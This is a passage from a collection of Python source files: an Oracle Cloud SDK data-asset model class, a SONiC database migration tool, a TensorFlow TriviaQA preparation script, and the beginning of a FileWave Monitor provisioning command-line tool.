'assetProperties',\n 'registry_metadata': 'registryMetadata',\n 'service_name': 'serviceName',\n 'driver_class': 'driverClass',\n 'credential_file_content': 'credentialFileContent',\n 'wallet_secret': 'walletSecret',\n 'wallet_password_secret': 'walletPasswordSecret',\n 'region_id': 'regionId',\n 'tenancy_id': 'tenancyId',\n 'compartment_id': 'compartmentId',\n 'autonomous_db_id': 'autonomousDbId',\n 'default_connection': 'defaultConnection'\n }\n\n self._model_type = None\n self._key = None\n self._model_version = None\n self._name = None\n self._description = None\n self._object_status = None\n self._object_version = None\n self._identifier = None\n self._external_key = None\n self._asset_properties = None\n self._registry_metadata = None\n self._service_name = None\n self._driver_class = None\n self._credential_file_content = None\n self._wallet_secret = None\n self._wallet_password_secret = None\n self._region_id = None\n self._tenancy_id = None\n self._compartment_id = None\n self._autonomous_db_id = None\n self._default_connection = None\n self._model_type = 'ORACLE_ATP_DATA_ASSET'\n\n @property\n def service_name(self):\n \"\"\"\n Gets the service_name of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing instance service name.\n\n\n :return: The service_name of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._service_name\n\n @service_name.setter\n def service_name(self, service_name):\n \"\"\"\n Sets the service_name of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing instance service name.\n\n\n :param service_name: The service_name of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._service_name = service_name\n\n @property\n def driver_class(self):\n \"\"\"\n Gets the driver_class of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing driver class\n\n\n :return: The driver_class of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._driver_class\n\n @driver_class.setter\n def driver_class(self, driver_class):\n \"\"\"\n Sets the driver_class of this UpdateDataAssetFromAtp.\n The Autonomous Transaction Processing driver class\n\n\n :param driver_class: The driver_class of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._driver_class = driver_class\n\n @property\n def credential_file_content(self):\n \"\"\"\n Gets the credential_file_content of this UpdateDataAssetFromAtp.\n The credential file content from an Autonomous Transaction Processing wallet.\n\n\n :return: The credential_file_content of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._credential_file_content\n\n @credential_file_content.setter\n def credential_file_content(self, credential_file_content):\n \"\"\"\n Sets the credential_file_content of this UpdateDataAssetFromAtp.\n The credential file content from an Autonomous Transaction Processing wallet.\n\n\n :param credential_file_content: The credential_file_content of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._credential_file_content = credential_file_content\n\n @property\n def wallet_secret(self):\n \"\"\"\n Gets the wallet_secret of this UpdateDataAssetFromAtp.\n\n :return: The wallet_secret of this UpdateDataAssetFromAtp.\n :rtype: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n return self._wallet_secret\n\n @wallet_secret.setter\n def wallet_secret(self, wallet_secret):\n \"\"\"\n Sets the wallet_secret of this UpdateDataAssetFromAtp.\n\n :param wallet_secret: The wallet_secret of this UpdateDataAssetFromAtp.\n :type: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n self._wallet_secret = wallet_secret\n\n @property\n def wallet_password_secret(self):\n \"\"\"\n Gets the wallet_password_secret of this UpdateDataAssetFromAtp.\n\n :return: The wallet_password_secret of this UpdateDataAssetFromAtp.\n :rtype: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n return self._wallet_password_secret\n\n @wallet_password_secret.setter\n def wallet_password_secret(self, wallet_password_secret):\n \"\"\"\n Sets the wallet_password_secret of this UpdateDataAssetFromAtp.\n\n :param wallet_password_secret: The wallet_password_secret of this UpdateDataAssetFromAtp.\n :type: oci.data_integration.models.SensitiveAttribute\n \"\"\"\n self._wallet_password_secret = wallet_password_secret\n\n @property\n def region_id(self):\n \"\"\"\n Gets the region_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance region Id.\n\n\n :return: The region_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._region_id\n\n @region_id.setter\n def region_id(self, region_id):\n \"\"\"\n Sets the region_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance region Id.\n\n\n :param region_id: The region_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._region_id = region_id\n\n @property\n def tenancy_id(self):\n \"\"\"\n Gets the tenancy_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance tenancy Id.\n\n\n :return: The tenancy_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._tenancy_id\n\n @tenancy_id.setter\n def tenancy_id(self, tenancy_id):\n \"\"\"\n Sets the tenancy_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance tenancy Id.\n\n\n :param tenancy_id: The tenancy_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._tenancy_id = tenancy_id\n\n @property\n def compartment_id(self):\n \"\"\"\n Gets the compartment_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance compartment Id.\n\n\n :return: The compartment_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._compartment_id\n\n @compartment_id.setter\n def compartment_id(self, compartment_id):\n \"\"\"\n Sets the compartment_id of this UpdateDataAssetFromAtp.\n The Autonomous Data Warehouse instance compartment Id.\n\n\n :param compartment_id: The compartment_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._compartment_id = compartment_id\n\n @property\n def autonomous_db_id(self):\n \"\"\"\n Gets the autonomous_db_id of this UpdateDataAssetFromAtp.\n Tha Autonomous Database Id\n\n\n :return: The autonomous_db_id of this UpdateDataAssetFromAtp.\n :rtype: str\n \"\"\"\n return self._autonomous_db_id\n\n @autonomous_db_id.setter\n def autonomous_db_id(self, autonomous_db_id):\n \"\"\"\n Sets the autonomous_db_id of this UpdateDataAssetFromAtp.\n Tha Autonomous Database Id\n\n\n :param autonomous_db_id: The autonomous_db_id of this UpdateDataAssetFromAtp.\n :type: str\n \"\"\"\n self._autonomous_db_id = autonomous_db_id\n\n @property\n def default_connection(self):\n \"\"\"\n Gets the default_connection of this UpdateDataAssetFromAtp.\n\n :return: The default_connection of this UpdateDataAssetFromAtp.\n :rtype: oci.data_integration.models.UpdateConnectionFromAtp\n \"\"\"\n return self._default_connection\n\n @default_connection.setter\n def default_connection(self, default_connection):\n \"\"\"\n Sets the default_connection of this UpdateDataAssetFromAtp.\n\n :param default_connection: The default_connection of this UpdateDataAssetFromAtp.\n :type: oci.data_integration.models.UpdateConnectionFromAtp\n \"\"\"\n self._default_connection = default_connection\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n"} {"ext": "py", "sha": "1a31404749354acdb2af34a31902f9dc5c7a0c8a", "content": "#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport sys\nimport traceback\nimport re\n\nfrom sonic_py_common import device_info, logger\nfrom swsscommon.swsscommon import SonicV2Connector, ConfigDBConnector, SonicDBConfig\n\nINIT_CFG_FILE = '/etc/sonic/init_cfg.json'\nSYSLOG_IDENTIFIER = 'db_migrator'\n\n\n# Global logger instance\nlog = logger.Logger(SYSLOG_IDENTIFIER)\n\n\nclass DBMigrator():\n def __init__(self, namespace, socket=None):\n \"\"\"\n Version string format:\n version_<major>_<minor>_<build>\n major: starting from 1, sequentially incrementing in master\n branch.\n minor: in github branches, minor version stays in 0. This minor\n version creates space for private branches derived from\n github public branches. These private branches shall use\n none-zero values.\n build: sequentially increase within a minor version domain.\n \"\"\"\n self.CURRENT_VERSION = 'version_2_0_0'\n\n self.TABLE_NAME = 'VERSIONS'\n self.TABLE_KEY = 'DATABASE'\n self.TABLE_FIELD = 'VERSION'\n\n db_kwargs = {}\n if socket:\n db_kwargs['unix_socket_path'] = socket\n\n if namespace is None:\n self.configDB = ConfigDBConnector(**db_kwargs)\n else:\n self.configDB = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace, **db_kwargs)\n self.configDB.db_connect('CONFIG_DB')\n\n self.appDB = SonicV2Connector(host='127.0.0.1')\n if self.appDB is not None:\n self.appDB.connect(self.appDB.APPL_DB)\n\n self.stateDB = SonicV2Connector(host='127.0.0.1')\n if self.stateDB is not None:\n self.stateDB.connect(self.stateDB.STATE_DB)\n\n version_info = device_info.get_sonic_version_info()\n asic_type = version_info.get('asic_type')\n self.asic_type = asic_type\n\n if asic_type == \"mellanox\":\n from mellanox_buffer_migrator import MellanoxBufferMigrator\n self.mellanox_buffer_migrator = MellanoxBufferMigrator(self.configDB)\n\n def migrate_pfc_wd_table(self):\n '''\n Migrate all data entries from table PFC_WD_TABLE to PFC_WD\n '''\n data = self.configDB.get_table('PFC_WD_TABLE')\n for key in data:\n self.configDB.set_entry('PFC_WD', key, data[key])\n self.configDB.delete_table('PFC_WD_TABLE')\n\n def is_ip_prefix_in_key(self, key):\n '''\n Function to check if IP address is present in the key. If it\n is present, then the key would be a tuple or else, it shall be\n be string\n '''\n return (isinstance(key, tuple))\n\n def migrate_interface_table(self):\n '''\n Migrate all data from existing INTERFACE table with IP Prefix\n to have an additional ONE entry without IP Prefix. For. e.g, for an entry\n \"Vlan1000|192.168.0.1/21\": {}\", this function shall add an entry without\n IP prefix as \"\"Vlan1000\": {}\". This is for VRF compatibility.\n '''\n if_db = []\n if_tables = {\n 'INTERFACE',\n 'PORTCHANNEL_INTERFACE',\n 'VLAN_INTERFACE',\n 'LOOPBACK_INTERFACE'\n }\n for table in if_tables:\n data = self.configDB.get_table(table)\n for key in data:\n if not self.is_ip_prefix_in_key(key):\n if_db.append(key)\n continue\n\n for table in if_tables:\n data = self.configDB.get_table(table)\n for key in data:\n if not self.is_ip_prefix_in_key(key) or key[0] in if_db:\n continue\n log.log_info('Migrating interface table for ' + key[0])\n self.configDB.set_entry(table, key[0], data[key])\n if_db.append(key[0])\n\n def migrate_intf_table(self):\n '''\n Migrate all data from existing INTF table in APP DB during warmboot with IP Prefix\n to have an additional ONE entry without IP Prefix. For. e.g, for an entry\n \"Vlan1000:192.168.0.1/21\": {}\", this function shall add an entry without\n IP prefix as \"\"Vlan1000\": {}\". This also migrates 'lo' to 'Loopback0' interface\n '''\n if self.appDB is None:\n return\n\n data = self.appDB.keys(self.appDB.APPL_DB, \"INTF_TABLE:*\")\n\n if data is None:\n return\n\n if_db = []\n for key in data:\n if_name = key.split(\":\")[1]\n if if_name == \"lo\":\n self.appDB.delete(self.appDB.APPL_DB, key)\n key = key.replace(if_name, \"Loopback0\")\n log.log_info('Migrating lo entry to ' + key)\n self.appDB.set(self.appDB.APPL_DB, key, 'NULL', 'NULL')\n\n if '/' not in key:\n if_db.append(key.split(\":\")[1])\n continue\n\n data = self.appDB.keys(self.appDB.APPL_DB, \"INTF_TABLE:*\")\n for key in data:\n if_name = key.split(\":\")[1]\n if if_name in if_db:\n continue\n log.log_info('Migrating intf table for ' + if_name)\n table = \"INTF_TABLE:\" + if_name\n self.appDB.set(self.appDB.APPL_DB, table, 'NULL', 'NULL')\n if_db.append(if_name)\n\n def migrate_copp_table(self):\n '''\n Delete the existing COPP table\n '''\n if self.appDB is None:\n return\n\n keys = self.appDB.keys(self.appDB.APPL_DB, \"COPP_TABLE:*\")\n if keys is None:\n return\n for copp_key in keys:\n self.appDB.delete(self.appDB.APPL_DB, copp_key)\n\n def migrate_config_db_buffer_tables_for_dynamic_calculation(self, speed_list, cable_len_list, default_dynamic_th, default_lossless_profiles, abandon_method, append_item_method):\n '''\n Migrate buffer tables to dynamic calculation mode\n parameters\n @speed_list - list of speed supported\n @cable_len_list - list of cable length supported\n @default_dynamic_th - default dynamic th\n @default_lossless_profiles - default lossless profiles from the previous image\n @abandon_method - a function which is called to abandon the migration and keep the current configuration\n if the current one doesn't match the default one\n @append_item_method - a function which is called to append an item to the list of pending commit items\n any update to buffer configuration will be pended and won't be applied until \n all configuration is checked and aligns with the default one\n\n 1. Buffer profiles for lossless PGs in BUFFER_PROFILE table will be removed\n if their names have the convention of pg_lossless_<speed>_<cable_length>_profile\n where the speed and cable_length belongs speed_list and cable_len_list respectively\n and the dynamic_th is equal to default_dynamic_th\n 2. Insert tables required for dynamic buffer calculation\n - DEFAULT_LOSSLESS_BUFFER_PARAMETER|AZURE: {'default_dynamic_th': default_dynamic_th}\n - LOSSLESS_TRAFFIC_PATTERN|AZURE: {'mtu': '1500', 'small_packet_percentage': '100'}\n 3. For lossless dynamic PGs, remove the explicit referencing buffer profiles\n Before: BUFFER_PG|<port>|3-4: {'profile': 'BUFFER_PROFILE|pg_lossless_<speed>_<cable_length>_profile'}\n After: BUFFER_PG|<port>|3-4: {'profile': 'NULL'}\n '''\n # Migrate BUFFER_PROFILEs, removing dynamically generated profiles\n dynamic_profile = self.configDB.get_table('BUFFER_PROFILE')\n profile_pattern = 'pg_lossless_([1-9][0-9]*000)_([1-9][0-9]*m)_profile'\n for name, info in dynamic_profile.items():\n m = re.search(profile_pattern, name)\n if not m:\n continue\n speed = m.group(1)\n cable_length = m.group(2)\n if speed in speed_list and cable_length in cable_len_list:\n log.log_info(\"current profile {} {}\".format(name, info))\n log.log_info(\"default profile {} {}\".format(name, default_lossless_profiles.get(name)))\n default_profile = default_lossless_profiles.get(name);\n if info.get(\"xon\") == default_profile.get(\"xon\") and info.get(\"size\") == default_profile.get(\"size\") and info.get('dynamic_th') == default_dynamic_th:\n append_item_method(('BUFFER_PROFILE', name, None))\n log.log_info(\"Lossless profile {} has been removed\".format(name))\n else:\n log.log_notice(\"Lossless profile {} doesn't match the default configuration, keep using traditional buffer calculation mode\")\n abandon_method()\n return True\n\n # Migrate BUFFER_PGs, removing the explicit designated profiles\n buffer_pgs = self.configDB.get_table('BUFFER_PG')\n ports = self.configDB.get_table('PORT')\n all_cable_lengths = self.configDB.get_table('CABLE_LENGTH')\n if not buffer_pgs or not ports or not all_cable_lengths:\n log.log_notice(\"At lease one of tables BUFFER_PG, PORT and CABLE_LENGTH hasn't been defined, skip following migration\")\n abandon_method()\n return True\n\n cable_lengths = all_cable_lengths[list(all_cable_lengths.keys())[0]]\n for name, profile in buffer_pgs.items():\n # do the db migration\n port, pg = name\n if pg != '3-4':\n continue\n try:\n profile_name = profile['profile'][1:-1].split('|')[1]\n m = re.search(profile_pattern, profile_name)\n except Exception:\n continue\n if not m:\n continue\n speed = m.group(1)\n cable_length = m.group(2)\n try:\n if speed == ports[port]['speed'] and cable_length == cable_lengths[port]:\n append_item_method(('BUFFER_PG', name, {'profile': 'NULL'}))\n else:\n log.log_notice(\"Lossless PG profile {} for port {} doesn't match its speed {} or cable length {}, keep using traditional buffer calculation mode\".format(\n profile_name, port, speed, cable_length))\n abandon_method()\n return True\n except Exception:\n continue\n\n # Insert other tables required for dynamic buffer calculation\n metadata = self.configDB.get_entry('DEVICE_METADATA', 'localhost')\n metadata['buffer_model'] = 'dynamic'\n append_item_method(('DEVICE_METADATA', 'localhost', metadata))\n append_item_method(('DEFAULT_LOSSLESS_BUFFER_PARAMETER', 'AZURE', {'default_dynamic_th': default_dynamic_th}))\n append_item_method(('LOSSLESS_TRAFFIC_PATTERN', 'AZURE', {'mtu': '1500', 'small_packet_percentage': '100'}))\n\n return True\n\n def prepare_dynamic_buffer_for_warm_reboot(self, buffer_pools = None, buffer_profiles = None, buffer_pgs = None):\n '''\n This is the very first warm reboot of buffermgrd (dynamic) if the system reboot from old image by warm-reboot\n In this case steps need to be taken to get buffermgrd prepared (for warm reboot)\n\n During warm reboot, buffer tables should be installed in the first place.\n However, it isn't able to achieve that when system is warm-rebooted from an old image\n without dynamic buffer supported, because the buffer info wasn't in the APPL_DB in the old image.\n The solution is to copy that info from CONFIG_DB into APPL_DB in db_migrator.\n During warm-reboot, db_migrator adjusts buffer info in CONFIG_DB by removing some fields\n according to requirement from dynamic buffer calculation.\n The buffer info before that adjustment needs to be copied to APPL_DB.\n\n 1. set WARM_RESTART_TABLE|buffermgrd as {restore_count: 0}\n 2. Copy the following tables from CONFIG_DB into APPL_DB in case of warm reboot\n The separator in fields that reference objects in other table needs to be updated from '|' to ':'\n - BUFFER_POOL\n - BUFFER_PROFILE, separator updated for field 'pool'\n - BUFFER_PG, separator updated for field 'profile'\n - BUFFER_QUEUE, separator updated for field 'profile\n - BUFFER_PORT_INGRESS_PROFILE_LIST, separator updated for field 'profile_list'\n - BUFFER_PORT_EGRESS_PROFILE_LIST, separator updated for field 'profile_list'\n\n '''\n warmreboot_state = self.stateDB.get(self.stateDB.STATE_DB, 'WARM_RESTART_ENABLE_TABLE|system', 'enable')\n mmu_size = self.stateDB.get(self.stateDB.STATE_DB, 'BUFFER_MAX_PARAM_TABLE|global', 'mmu_size')\n if warmreboot_state == 'true' and not mmu_size:\n log.log_notice(\"This is the very first run of buffermgrd (dynamic), prepare info required from warm reboot\")\n else:\n return True\n\n buffer_table_list = [\n ('BUFFER_POOL', buffer_pools, None),\n ('BUFFER_PROFILE', buffer_profiles, 'pool'),\n ('BUFFER_PG', buffer_pgs, 'profile'),\n ('BUFFER_QUEUE', None, 'profile'),\n ('BUFFER_PORT_INGRESS_PROFILE_LIST', None, 'profile_list'),\n ('BUFFER_PORT_EGRESS_PROFILE_LIST', None, 'profile_list')\n ]\n\n for pair in buffer_table_list:\n keys_copied = []\n keys_ignored = []\n table_name, entries, reference_field_name = pair\n app_table_name = table_name + \"_TABLE\"\n if not entries:\n entries = self.configDB.get_table(table_name)\n for key, items in entries.items():\n # copy items to appl db\n if reference_field_name:\n confdb_ref = items.get(reference_field_name)\n if not confdb_ref or confdb_ref == \"NULL\":\n keys_ignored.append(key)\n continue\n items_referenced = confdb_ref.split(',')\n appdb_ref = \"\"\n first_item = True\n for item in items_referenced:\n if first_item:\n first_item = False\n else:\n appdb_ref += ','\n subitems = item.split('|')\n first_key = True\n for subitem in subitems:\n if first_key:\n appdb_ref += subitem + '_TABLE'\n first_key = False\n else:\n appdb_ref += ':' + subitem\n\n items[reference_field_name] = appdb_ref\n keys_copied.append(key)\n if type(key) is tuple:\n appl_db_key = app_table_name + ':' + ':'.join(key)\n else:\n appl_db_key = app_table_name + ':' + key\n for field, data in items.items():\n self.appDB.set(self.appDB.APPL_DB, appl_db_key, field, data)\n\n if keys_copied:\n log.log_info(\"The following items in table {} in CONFIG_DB have been copied to APPL_DB: {}\".format(table_name, keys_copied))\n if keys_ignored:\n log.log_info(\"The following items in table {} in CONFIG_DB have been ignored: {}\".format(table_name, keys_copied))\n\n return True\n\n def version_unknown(self):\n \"\"\"\n version_unknown tracks all SONiC versions that doesn't have a version\n string defined in config_DB.\n Nothing can be assumped when migrating from this version to the next\n version.\n Any migration operation needs to test if the DB is in expected format\n before migrating date to the next version.\n \"\"\"\n\n log.log_info('Handling version_unknown')\n\n # NOTE: Uncomment next 3 lines of code when the migration code is in\n # place. Note that returning specific string is intentional,\n # here we only intended to migrade to DB version 1.0.1.\n # If new DB version is added in the future, the incremental\n # upgrade will take care of the subsequent migrations.\n self.migrate_pfc_wd_table()\n self.migrate_interface_table()\n self.migrate_intf_table()\n self.set_version('version_1_0_2')\n return 'version_1_0_2'\n\n def version_1_0_1(self):\n \"\"\"\n Version 1_0_1.\n \"\"\"\n log.log_info('Handling version_1_0_1')\n\n self.migrate_interface_table()\n self.migrate_intf_table()\n self.set_version('version_1_0_2')\n return 'version_1_0_2'\n\n def version_1_0_2(self):\n \"\"\"\n Version 1_0_2.\n \"\"\"\n log.log_info('Handling version_1_0_2')\n # Check ASIC type, if Mellanox platform then need DB migration\n if self.asic_type == \"mellanox\":\n if self.mellanox_buffer_migrator.mlnx_migrate_buffer_pool_size('version_1_0_2', 'version_1_0_3') \\\n and self.mellanox_buffer_migrator.mlnx_flush_new_buffer_configuration():\n self.set_version('version_1_0_3')\n else:\n self.set_version('version_1_0_3')\n return 'version_1_0_3'\n\n def version_1_0_3(self):\n \"\"\"\n Version 1_0_3.\n \"\"\"\n log.log_info('Handling version_1_0_3')\n\n # Check ASIC type, if Mellanox platform then need DB migration\n if self.asic_type == \"mellanox\":\n if self.mellanox_buffer_migrator.mlnx_migrate_buffer_pool_size('version_1_0_3', 'version_1_0_4') \\\n and self.mellanox_buffer_migrator.mlnx_migrate_buffer_profile('version_1_0_3', 'version_1_0_4') \\\n and self.mellanox_buffer_migrator.mlnx_flush_new_buffer_configuration():\n self.set_version('version_1_0_4')\n else:\n self.set_version('version_1_0_4')\n\n return 'version_1_0_4'\n\n def version_1_0_4(self):\n \"\"\"\n Current latest version. Nothing to do here.\n \"\"\"\n log.log_info('Handling version_1_0_4')\n\n # Check ASIC type, if Mellanox platform then need DB migration\n if self.asic_type == \"mellanox\":\n speed_list = self.mellanox_buffer_migrator.default_speed_list\n cable_len_list = self.mellanox_buffer_migrator.default_cable_len_list\n buffer_pools = self.configDB.get_table('BUFFER_POOL')\n buffer_profiles = self.configDB.get_table('BUFFER_PROFILE')\n buffer_pgs = self.configDB.get_table('BUFFER_PG')\n default_lossless_profiles = self.mellanox_buffer_migrator.mlnx_get_default_lossless_profile('version_1_0_4')\n abandon_method = self.mellanox_buffer_migrator.mlnx_abandon_pending_buffer_configuration\n append_method = self.mellanox_buffer_migrator.mlnx_append_item_on_pending_configuration_list\n\n if self.mellanox_buffer_migrator.mlnx_migrate_buffer_pool_size('version_1_0_4', 'version_2_0_0') \\\n and self.mellanox_buffer_migrator.mlnx_migrate_buffer_profile('version_1_0_4', 'version_2_0_0') \\\n and self.migrate_config_db_buffer_tables_for_dynamic_calculation(speed_list, cable_len_list, '0', default_lossless_profiles,\n abandon_method, append_method) \\\n and self.mellanox_buffer_migrator.mlnx_flush_new_buffer_configuration() \\\n and self.prepare_dynamic_buffer_for_warm_reboot(buffer_pools, buffer_profiles, buffer_pgs):\n metadata = self.configDB.get_entry('DEVICE_METADATA', 'localhost')\n if not metadata.get('buffer_model'):\n metadata['buffer_model'] = 'traditional'\n self.configDB.set_entry('DEVICE_METADATA', 'localhost', metadata)\n log.log_notice('Setting buffer_model to traditional')\n else:\n log.log_notice('Got buffer_model {}'.format(metadata.get('buffer_model')))\n\n self.set_version('version_2_0_0')\n else:\n self.prepare_dynamic_buffer_for_warm_reboot()\n\n metadata = self.configDB.get_entry('DEVICE_METADATA', 'localhost')\n metadata['buffer_model'] = 'traditional'\n self.configDB.set_entry('DEVICE_METADATA', 'localhost', metadata)\n log.log_notice('Setting buffer_model to traditional')\n\n self.set_version('version_2_0_0')\n\n return 'version_2_0_0'\n\n def version_2_0_0(self):\n \"\"\"\n Current latest version. Nothing to do here.\n \"\"\"\n log.log_info('Handling version_2_0_0')\n\n return None\n\n def get_version(self):\n version = self.configDB.get_entry(self.TABLE_NAME, self.TABLE_KEY)\n if version and version[self.TABLE_FIELD]:\n return version[self.TABLE_FIELD]\n\n return 'version_unknown'\n\n\n def set_version(self, version=None):\n if not version:\n version = self.CURRENT_VERSION\n log.log_info('Setting version to ' + version)\n entry = { self.TABLE_FIELD : version }\n self.configDB.set_entry(self.TABLE_NAME, self.TABLE_KEY, entry)\n\n\n def common_migration_ops(self):\n try:\n with open(INIT_CFG_FILE) as f:\n init_db = json.load(f)\n except Exception as e:\n raise Exception(str(e))\n\n for init_cfg_table, table_val in init_db.items():\n data = self.configDB.get_table(init_cfg_table)\n if data:\n # Ignore overriding the values that pre-exist in configDB\n continue\n log.log_info(\"Migrating table {} from INIT_CFG to config_db\".format(init_cfg_table))\n # Update all tables that do not exist in configDB but are present in INIT_CFG\n for init_table_key, init_table_val in table_val.items():\n self.configDB.set_entry(init_cfg_table, init_table_key, init_table_val)\n\n self.migrate_copp_table()\n\n def migrate(self):\n version = self.get_version()\n log.log_info('Upgrading from version ' + version)\n while version:\n next_version = getattr(self, version)()\n if next_version == version:\n raise Exception('Version migrate from %s stuck in same version' % version)\n version = next_version\n # Perform common migration ops\n self.common_migration_ops()\n\ndef main():\n try:\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-o',\n dest='operation',\n metavar='operation (migrate, set_version, get_version)',\n type = str,\n required = False,\n choices=['migrate', 'set_version', 'get_version'],\n help = 'operation to perform [default: get_version]',\n default='get_version')\n parser.add_argument('-s',\n dest='socket',\n metavar='unix socket',\n type = str,\n required = False,\n help = 'the unix socket that the desired database listens on',\n default = None )\n parser.add_argument('-n',\n dest='namespace',\n metavar='asic namespace',\n type = str,\n required = False,\n help = 'The asic namespace whose DB instance we need to connect',\n default = None )\n args = parser.parse_args()\n operation = args.operation\n socket_path = args.socket\n namespace = args.namespace\n\n if args.namespace is not None:\n SonicDBConfig.load_sonic_global_db_config(namespace=args.namespace)\n\n if socket_path:\n dbmgtr = DBMigrator(namespace, socket=socket_path)\n else:\n dbmgtr = DBMigrator(namespace)\n\n result = getattr(dbmgtr, operation)()\n if result:\n print(str(result))\n\n except Exception as e:\n log.log_error('Caught exception: ' + str(e))\n traceback.print_exc()\n print(str(e))\n parser.print_help()\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a3140c3dd840c57a081c358620998829408e123", "content": "# Copyright 2022 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Downloads and prepares TriviaQA dataset.\"\"\"\nfrom unittest import mock\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport apache_beam as beam\nimport tensorflow_datasets as tfds\n\nfrom official.projects.triviaqa import dataset # pylint: disable=unused-import\n\nflags.DEFINE_integer('sequence_length', 4096, 'Max number of tokens.')\n\nflags.DEFINE_integer(\n 'global_sequence_length', None,\n 'Max number of question tokens plus sentences. If not set, defaults to '\n 'sequence_length // 16 + 64.')\n\nflags.DEFINE_integer(\n 'stride', 3072,\n 'For documents longer than `sequence_length`, where to split them.')\n\nflags.DEFINE_string(\n 'sentencepiece_model_path', None,\n 'SentencePiece model to use for tokenization.')\n\nflags.DEFINE_string('data_dir', None, 'Data directory for TFDS.')\n\nflags.DEFINE_string('runner', 'DirectRunner', 'Beam runner to use.')\n\nFLAGS = flags.FLAGS\n\n\ndef main(argv):\n if len(argv) > 1:\n raise app.UsageError('Too many command-line arguments.')\n builder = tfds.builder(\n 'bigbird_trivia_qa/rc_wiki.preprocessed',\n data_dir=FLAGS.data_dir,\n sentencepiece_model_path=FLAGS.sentencepiece_model_path,\n sequence_length=FLAGS.sequence_length,\n global_sequence_length=FLAGS.global_sequence_length,\n stride=FLAGS.stride)\n download_config = tfds.download.DownloadConfig(\n beam_options=beam.options.pipeline_options.PipelineOptions(flags=[\n f'--runner={FLAGS.runner}',\n '--direct_num_workers=8',\n '--direct_running_mode=multi_processing',\n ]))\n with mock.patch('tensorflow_datasets.core.download.extractor._normpath',\n new=lambda x: x):\n builder.download_and_prepare(download_config=download_config)\n logging.info(builder.info.splits)\n\n\nif __name__ == '__main__':\n flags.mark_flag_as_required('sentencepiece_model_path')\n app.run(main)\n"} {"ext": "py", "sha": "1a3140d183ab009c8d4d030d35870b9d71da2093", "content": "\nimport os\nimport click\nimport shutil\nimport subprocess\nimport pkg_resources\nimport sys\nimport errno\nimport traceback\n\nfrom monitor.logs import init_logging, logger\n\nclass ValidationExceptionBinaryNotFound(Exception):\n pass\n\n\nclass NotRunningRoot(Exception):\n pass\n\n\n@click.group()\ndef cli():\n click.echo(\"FileWave Monitor v13 configuration.\")\n\n\ndelay_30m = 60 * 30\n\n\ndef run_root_command(cmd_array, **kwargs):\n try:\n os.rename('/etc/foo', '/etc/bar')\n except IOError as e:\n if (e == errno.EPERM):\n return False\n\n proc = subprocess.Popen(cmd_array, stdout=subprocess.PIPE, **kwargs)\n return proc.communicate()[0].decode('utf-8')\n\ndef run_root_commands(commands):\n for c in commands:\n run_root_command(c, shell=True)\n\ndef running_on_a_fwxserver_host(exist_func=os.path.exists):\n '''\n Check directories exist to see if we are running on a FileWave server host installation\n This should return True if we are, regardless of being Mac/Linux/Docker etc.\n '''\n dirs_that_must_exist = [\"bin\", \"certs\",\n \"django\", \"log\"]\n main_filewave_dir = os.path.join(\"/usr/local\", \"filewave\")\n if not exist_func(main_filewave_dir):\n return False\n for f in [os.path.join(main_filewave_dir, d) for d in dirs_that_must_exist]:\n if not exist_func(f):\n return False\n return True\n\n\n@cli.command('integrate', help=\"Integrates the module assuming you are running this on the FileWave Server\")\ndef install_into_environment():\n init_logging()\n\n if running_on_a_fwxserver_host():\n if run_root_command([\"ls\", \"-l\"]) is False:\n logger.info(\n \"provisioning is requested - but I've detected you are not running as root - aborting\")\n raise NotRunningRoot(\n \"provisioning is requested - but I've detected you are not running as root - aborting\")\n\n try:\n provision_postgres_wal_interval()\n provision_apache_mod_status()\n provision_prometheus_binary()\n provision_mtail_binary()\n provision_exporters()\n provision_supervisord_conf()\n validate_provisioning()\n\n logger.info(\"Looks like everything is configured, please restart the server now, then validate installation.\")\n\n except Exception as e:\n logger.error(\"Error during provisioning, are you using sudo?\")\n logger.error(e)\n traceback.print_exc(file=sys.stdout)\n return\n else:\n logger.info(\"Didn't detect a FileWave Server host - configuration aborted\")\n\ndef provision_postgres_wal_interval():\n # /usr/local/filewave/fwxserver/DB/pg_data/postgresql.conf\n # log_min_duration_statement = 200\n #\n cmds = [\n \"sed -i 's/log_min_duration_statement = 10000/log_min_duration_statement = 200/g' 